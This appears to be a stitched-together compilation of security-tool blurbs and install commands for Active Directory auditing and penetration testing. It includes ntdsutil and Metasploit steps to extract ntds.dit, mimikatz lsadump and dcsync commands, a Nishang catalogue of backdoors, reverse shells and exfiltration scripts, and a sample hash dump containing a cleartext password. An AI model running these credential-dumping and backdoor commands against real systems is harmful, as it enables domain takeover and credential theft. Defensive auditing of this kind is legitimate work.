+ Get-THR_DLLs: Gets a list of DLLs loaded by all process on a given system.
+ Get-THR_DNS: Gets the DNS cache from all connected interfaces for the given computer(s).
+ Get-THR_Drivers: Gets a list of drivers for the given computer(s).
+ Get-THR_EnvVars: Retreives the values of all environment variables from one or more systems.
+ Get-THR_GroupMembers: Gets a list of the members of each local group on a given system.
+ Get-THR_Handles: Gets a list of Handles loaded by all process on a given system.
+ Get-THR_Hardware: Gets a list of installed devices for the given computer(s).
+ Get-THR_Hosts: Gets the arp cache from all connected interfaces for the given computer(s).
+ And Many More..
+ Powershell v3.0 or above
Use and Download:
git clone https://github.com/TonyPhipps/THRecon && cd THRecon Import-Module .\THRecon.psm1 Get-Command -Module THRecon
There’s a diagram explaining spoofing attacks and how Vindicate works on the wiki.
Requires .NET Framework 4.5.2
What is LLMNR/NBNS/mDNS spoofing and why do I need to detect it?
+ pentest.blog: What is LLMNR & WPAD and How to Abuse Them During Pentest ?
+ Aptive Consulting: LLMNR / NBT-NS Spoofing Attack Network Penetration Testing
+ GracefulSecurity: Stealing Accounts: LLMNR and NBT-NS Spoofing
Attackers might be stealing all sorts of credentials on your network (everything from Active Directory credentials to personal email accounts to database passwords) from right under your nose and you may be completely unaware it’s happening.
– *By default, Vindicate uses lookup names that shouldn’t exist in any network but look semi-realistic to an attacker who might be watching, to avoid false positives where you have real services that might rely on these name lookups. If systems with those names really do exist on your network, Vindicate will give false positives.
– Due to the above, Vindicate works best with custom flags that are tuned to your environment. Use -h to get help.
– As Vindicate uses a partial custom name service implementation written in .NET, it works even if multicast resolution is disabled on the client.
– Vindicate currently mostly relies on getting a WPAD response, with the SMB detection being very basic (it just checks if an SMB port is in use). If Vindicate is adopted and used I’ll write an SMB client to properly verify SMB servers and increase Vindicate’s confidence in its detection.
– Vindicate can detect mDNS spoofing (often associated with Mac OS), but this detection won’t work on Windows if multicast resolution is enabled as a required port is in use by the operating system. Consider disabling it for security reasons anyway (and reset the DNS Service to apply the changes).
– Vindicate does not require administrative permissions to run and is sad if you run it with high privileges.
– Vindicate can send false credentials to an attacker to frustrate their movements. Check out the -u, -p, and -d flags.
– Vindicate has been written with cross-platform use in mind, but has not been tested for this purpose yet. If this is desired, let me know with an issue and your platform.
Use and Download:
git clone https://github.com/Rushyo/VindicateTool && cd VindicateTool cd ReleaseBinaries VindicateCLI.exe -h
By performing regular audits, you can identify users with weak passwords and take action inline with your policies and procedures.
# General Tips
1. Introduce internal training on what a secure password is, why they’re important and embed it in to your induction programme.
2. Consider rolling out a password manager and adequate training for all of your users – stronger, longer and more unique passwords is better for everyone.
3. Gradually increase your password minimum length requirement to 12 characters.
4. Phase out forcing your users to “reset password every X days”. There is research to suggest that this doesn’t help create strong passwords, but in fact has the opposite effect.
5. Carry out a password audit quarterly. Do not name and shame people. Get HR buy-in and introduce a “3 strike system” that will carry a formal warning.
git clone https://github.com/eth0izzle/cracke-dit && cd cracke-dit pip install -r requirements.txt The first step in your password cracking adventure is to extract a copy of the Active Directory database, ntds.dit, which contains the password hashes. I like to involve and get as much buy-in as possible from the Admins so I will ask them very nicely to extract the files for me. However if you have domain credentials you can do it yourself: 1. On a Domain Controller open up an elevated command prompt. 2. Run `ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q`. 3. **Securely** extract `c:\temp\Active Directory\ntds.dit` and `c:\temp\registry\SYSTEM` to your system with cracke-dit. Or remotely via metasploit. Run the module `auxiliary/admin/smb/psexec_ntdsgrab` and fill in the required options. This requires SMB access via the C$ share. python cracked-dit.py --system SYSTEM --ntds samples/ntds.dit
Account with the following privileges:
– Access to remote machines’ security event logs
– ActiveDirectory read permissions (standard domain account)
– Computers synchronized with the same time, otherwise it can affect the results
– Minimum PowerShell 2.0
Ketshash is a tool for detecting suspicious privileged NTLM connections, based on the following information:
+ Security event logs on the monitored machines (Login events)
+ Authentication events from Active Directory
git clone https://github.com/cyberark/ketshash && cd ketshash Import-Module .\Ketshash.ps1 Example: Invoke-DetectPTH -TargetComputers "MARS-9" -LogFile "C:\tmp\log.txt"
Obtaining the required files:
NtdsAudit requires the ntds.dit Active Directory database, and optionally the SYSTEM registry hive if dumping password hashes. These files are locked by a domain controller and as such cannot be simply copy and pasted. The recommended method of obtaining these files from a domain controller is using the builtin ntdsutil utility.
Usage and Download:
git clone https://github.com/Dionach/NtdsAudit && cd NtdsAudit right click NtdsAudit.sln open with Visual Studio then Build Solution Or Manual Download here: https://github.com/Dionach/NtdsAudit/releases/download/v2.0.2/NtdsAudit.exe
Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.
Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.
– Prasadhak : Check running hashes of running process against the VirusTotal database.
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner
Powerpreter : All the functionality of nishang in a single script module.
+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
– Invoke-PowerShellTcpOneLine : Stripped down version of Invoke-PowerShellTcp. Also contains, a skeleton version which could fit in two tweets.
– Invoke-PowerShellUdp : An interactive PowerShell reverse connect or bind shell over UDP
– Invoke-PowerShellUdpOneLine : Stripped down version of Invoke-PowerShellUdp.
– Invoke-PoshRatHttps : Reverse interactive PowerShell over HTTPS.
– Invoke-PoshRatHttp : Reverse interactive PowerShell over HTTP.
– Remove-PoshRat : Clean the system after using Invoke-PoshRatHttps
– Invoke-PowerShellWmi : Interactive PowerShell using WMI.
– Invoke-PowerShellIcmp : An interactive PowerShell reverse shell over ICMP.
– Add-Exfiltration: Add data exfiltration capability to Gmail, Pastebin, a web server, and DNS to any script.
– Add-Persistence: Add reboot persistence capability to a script.
– Remove-Persistence: Remote persistence added by the Add-Persistence script.
– Do-Exfiltration: Pipe (|) this to any script to exfiltrate the output.
– Download: Transfer a file to the target.
– Parse_Keys : Parse keys logged by the keylogger.
– Invoke-Encode : Encode and compress a script or string.
– Invoke-Decode : Decode and decompress a script or string from Invoke-Encode.
– Start-CaptureServer : Run a web server which logs Basic authentication and SMB hashes.
— [Base64ToString] [StringToBase64] [ExetoText] [TexttoExe]
Download : Nishang.zip | Our Post Before
Source : http://www.labofapenetrationtester.com/
PowEnum executes common PowerSploit Powerview functions and combines the output into a spreadsheet for easy analysis. All network traffic is only sent to the DC(s).
– Invoke-PowEnum -PowerviewURL http://10.0.0.10/PowerView.ps1
– Invoke-PowEnum -FQDN test.domain.com
– Invoke-PowEnum -Mode SYSVOL
– Invoke-PowEnum -Credential test.domain.com\username -FQDN test.domain.com -Mode Special
This enumeration will generate suspicious traffic between the PowEnum system and the target DC(s). If there are security products watching traffic to the DC(s) (i.e. Microsoft ATA) PowEnum will likely get flagged.
git clone https://github.com/whitehat-zero/PowEnum && cd PowEnum Invoke-PowEnum Invoke-PowEnum -PowerviewURL http://10.0.0.10/PowerView.ps1 Invoke-PowEnum -FQDN test.domain.com Invoke-PowEnum -Mode SYSVOL Invoke-PowEnum -Credential test.domain.com\username -FQDN test.domain.com -Mode Special
* As mentioned in DSInternals web page(https://www.dsinternals.com/en/), it is possible to retrieve hashes remotely, instead of the well known method using vssadmin, ESEDBTOOLS and NTDSXtract, pretty slow in some cases because of the NTDS.dit size, ESEDBTOOLS misconfigurations, etc.
– Python 2.7 environment
– DSInternals output file generated with Get-ADReplAccount or Get-ADDBAccount.
To extract the hashes remotely:
1. Retrieve all users attributes with the DSinternals module Get-ADReplAccount, and save it to a local file.
Get-ADReplAccount -All -NamingContext 'DC=Example,DC=com' -Server DC1 -Credential $cred >> localfile.txt
The file generated has a format similar to the next one.
DistinguishedName: CN=April Reagan,OU=IT,DC=Adatum,DC=com Sid: S-1-5-21-3180365339-800773672-3767752645-1375 Guid: 124ae098-699b-4450-a47a-314a29cc90ea SamAccountName: April SamAccountType: User UserPrincipalName: April@adatum.com PrimaryGroupId: 513 SidHistory: Enabled: True Deleted: False LastLogon: DisplayName: April Reagan GivenName: April Surname: Reagan Description: NTHash: 92937945b518814341de3f726500d4ff LMHash: 727e3576618fa1754a3b108f3fa6cb6d NTHashHistory: Hash 01: 92937945b518814341de3f726500d4ff Hash 02: 1d3da193d2f45911a6f0fa940b9fb32f Hash 03: 402bc59d8a00641b7f386e78596340f4 LMHashHistory: Hash 01: 727e3576618fa1754a3b108f3fa6cb6d Hash 02: 5a5503d0e85f58abaad3b435b51404ee Hash 03: f9393d97e7a1873caad3b435b51404ee SupplementalCredentials: ClearText: Pa$$w0rd Kerberos: Credentials: DES_CBC_MD5 Key: 76fe3b5bda911a40 OldCredentials: DES_CBC_MD5 Key: 7f8c4f38e0ea0b80 Salt: ADATUM.COMApril Flags: 0 KerberosNew: Credentials: AES256_CTS_HMAC_SHA1_96 Key: 3a3b6a89bb82d112db5ef68f6db5d1afc2b806df61dcd85e3eacf3b85ee382d8 Iterations: 4096 AES128_CTS_HMAC_SHA1_96 Key: a72c8bc96c4a6f03244f0b0067a1e440 Iterations: 4096 DES_CBC_MD5 Key: 76fe3b5bda911a40 Iterations: 4096 OldCredentials: AES256_CTS_HMAC_SHA1_96 Key: 14e46244a59a37cd8aa7c1fe61896441c7d065fafe4874191e69c1fe28856810 Iterations: 4096 AES128_CTS_HMAC_SHA1_96 Key: 034b512ec64286dec951d6aff8d81fa8 Iterations: 4096 DES_CBC_MD5 Key: 7f8c4f38e0ea0b80 Iterations: 4096 OlderCredentials: AES256_CTS_HMAC_SHA1_96 Key: 2387ca8f936c8c154996809af8fee7c47fe4b9b5dd84d051fc43a9289bbaa3ab Iterations: 4096 AES128_CTS_HMAC_SHA1_96 Key: 29d536ec057f9063747161429b81f056 Iterations: 4096 DES_CBC_MD5 Key: 58f1cbe6e50e1f83 Iterations: 4096 ServiceCredentials: Salt: ADATUM.COMApril DefaultIterationCount: 4096 Flags: 0 WDigest: Hash 01: c3d012ab1101eb8f51b483fb4c5f8a7e Hash 02: c993da396914645b356ae7816251fcb1 Hash 03: 6b58530cab34de91189a603e22c2be15 Hash 04: c3d012ab1101eb8f51b483fb4c5f8a7e Hash 05: 5a762cf59fa31023dcba1ebd4725b443 Hash 06: c78bac91c0ba25cae5d44460fd65a73b Hash 07: 59d73cea16afd1aac6bf8acfa2768621 Hash 08: d2be383db9469a39736d9e2136054131 Hash 09: 079de9f4d94d97a80f1726497dfd1cc2 Hash 10: 85dbe1549d5fbfcc91f7fe5ac5910f52 Hash 11: 961a36bded5535b8fc15b4b8e6c48b93 Hash 12: 6ac8a60d83e9ae67c2097db716a6af17 Hash 13: e899e577d5f81ef5288ab67de07fad9a Hash 14: 135452ab86d40c3d47ca849646d5e176 Hash 15: a84c367eaa334d0a4cb98e36da011e0f Hash 16: 61a458eb70440b1a92639452f0c2c948 Hash 17: 238f4059776c3575be534afb46be4ccf Hash 18: 03ddf370064c544e9c6dbb6ccbf8f4ac Hash 19: 354dd6c77ccf35f63e48cd5af6473ccf Hash 20: 5f9800d734ebe9fb588def6aaafc40b7 Hash 21: 59aab99ebcddcbf13b96d75bb7a731e3 Hash 22: f1685383b0c131035ae264ee5bd24a8d Hash 23: 3119e42886b01cad00347e72d0cee594 Hash 24: ebef7f2c730e17ded8cba1ed20122602 Hash 25: 7d99673c9895e0b9c484e430578ee78e Hash 26: e1e20982753c6a1140c1a8241b23b9ea Hash 27: e5ec1c63e0e549e49cda218bc3752051 Hash 28: 26f2d85f7513d73dd93ab3afd2d90cf6 Hash 29: 84010d657e6b58ce233fae2bd7644222
2. Parse the localfile with dsinternaslparser.py
./dsinternalsparser.py -o dump localfile.txt
3. After execution, if no options are given, dsinternalsparser.py creates 6 files.
– NTLM File (dump_ntlm.txt): Contains username and current NTLM Hash.
– NTLM History File (dump_ntlm_history.txt): Contains username and NTLM History Hashes.
– LM File (dump_lm.txt): Contains username and current LM Hash.
– Cleartext File (dump_cleartext.txt): Contains username and Cleartext password, if exists.
– NTLM History File (dump_wdigest.txt): Contains username and WDigest history Hashes.
git clone https://github.com/r4wd3r/ADPWN && cd ADPWN wget https://raw.githubusercontent.com/r4wd3r/ADPWN/master/dsinternalsparser/dsinternalsparser.py chmod 755 dsinternalsparser.py python dsinternalsparser.py
ad-ldap-enum supports both authenticated and unauthenticated LDAP connections. Additionally, ad-ldap-enum can process nested groups and display a user’s actual group membership.
– Python 2.7.x
– python-ldap, python-pyasn1 python module.
git clone https://github.com/CroweCybersecurity/ad-ldap-enum && cd ad-ldap-enum pip install python-ldap python-pyasn1 python ad-ldap-enum.py -h
CrackMapExec is your one-stop-shop for pentesting Windows/Active Directory environments!
From enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more!
The biggest improvements over the above tools are:
– Pure Python script, no external tools required
– Fully concurrent threading
– Uses ONLY native WinAPI calls for discovering sessions, users, dumping SAM hashes etc…
– Opsec safe (no binaries are uploaded to dump clear-text credentials, inject shellcode etc…)
Intallation on Kali Linux, Ubuntu and all Linux Platform:
git clone https://github.com/byt3bl33d3r/CrackMapExec cd CrackMapExec pip install --upgrade -r requirements.txt python crackmapexec.py Update: git pull origin master git submodule init && git submodule update --recursive Upgrade using pip pip2 install crackmapexec --upgrade
Download Old Stable version: v3.1.5.zip | v3.1.5.tar.gz | Our Post Before
HOW IT WORKS?
RadiUID uses FreeRADIUS as a backend service to listen on RADIUS accounting ports (typically TCP\UDP 1813) and write recieved accounting information to accounting logs.
RadiUID then parses these logs, pulls down the User and IP mapping information and pushes those mappings to the Palo Alto firewall using the published RESTful XML API.
RadiUID runs as a system service on Linux and is very easy to configure and use. All configuration and interaction with RadiUID is via command line on the Linux BASH shell. Once the installer completes, RadiUID can be invoked from the command shell by typing radiuid followed by the desired command. Hit the [TAB] key for command options or hit [ENTER] for the list of options!
CHANGELOG UPDATES IN V2.3.0 –> V2.3.1:
+ ISSUE #22: Repaired broken RadiUID service control when in a container. Now you can start, stop, and restart FreeRADIUS and RadiUID services from within the container without having to restart the container from the host.
Usage, download and upgrade from source:
Install Docker: ### Install and configure SSH Server for SSH access to container ### RUN yum install -y openssh openssh-server openssh-clients sudo passwd RUN sshd-keygen RUN sed -i "s/UsePAM.*/UsePAM yes/g" /etc/ssh/sshd_config RUN sed -i "s/#UsePrivilegeSeparation.*/UsePrivilegeSeparation no/g" /etc/ssh/sshd_config RUN useradd admin -G wheel -s /bin/bash -m RUN echo 'root:radiuid' | chpasswd RUN echo '%wheel ALL=(ALL) ALL' >> /etc/sudoers ### Download and install RadiUID from latest release ### RUN curl -sL https://codeload.github.com/PackeTsar/radiuid/tar.gz/2.3.1 | tar xz RUN cd radiuid-2.3.1;python radiuid.py request reinstall replace-config no-confirm RUN cd radiuid-2.3.1;python radiuid.py request freeradius-install no-confirm ### Expose ports and provide run commands ### EXPOSE 1813/udp EXPOSE 1813/tcp EXPOSE 22/tcp CMD radiusd & radiuid run >> /etc/radiuid/STDOUT & /usr/sbin/sshd >> /etc/radiuid/SSH-STDOUT & /bin/bash ### Download and install RadiUID from latest release ### git clone https://github.com/PackeTsar/radiuid && radiuid python radiuid.py request reinstall replace-config no-confirm python radiuid.py request freeradius-install no-confirm ### Expose ports and provide run commands ### EXPOSE 1813/udp EXPOSE 1813/tcp CMD radiusd & radiuid run >> /etc/radiuid/STDOUT & /bin/bash
mimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.
It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.
mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
+ for mimikatz and mimilib : Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 – http://www.microsoft.com/download/details.aspx?id=44914)
+ for mimikatz driver, mimilove (and ddk2003 platform) : Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800
mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)
Build the solution:
+Download zip file, then unzip it + risht click open with visual studio isual Studio 2012 or 2013 after + After opening the solution, Build / Build Solution (you can change architecture) + mimikatz is now built and ready to be used! (Win32 / x64) -- you can have error MSB3073 about _build_.cmd and mimidrv, it's because the driver cannot be build without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK. Usage: * Crypto: crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export * vault & lsadump vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local
Download : mimikatz_trunk.zip | Our Post Before
Source : https://github.com/gentilkiwi | http://blog.gentilkiwi.com/mimikatz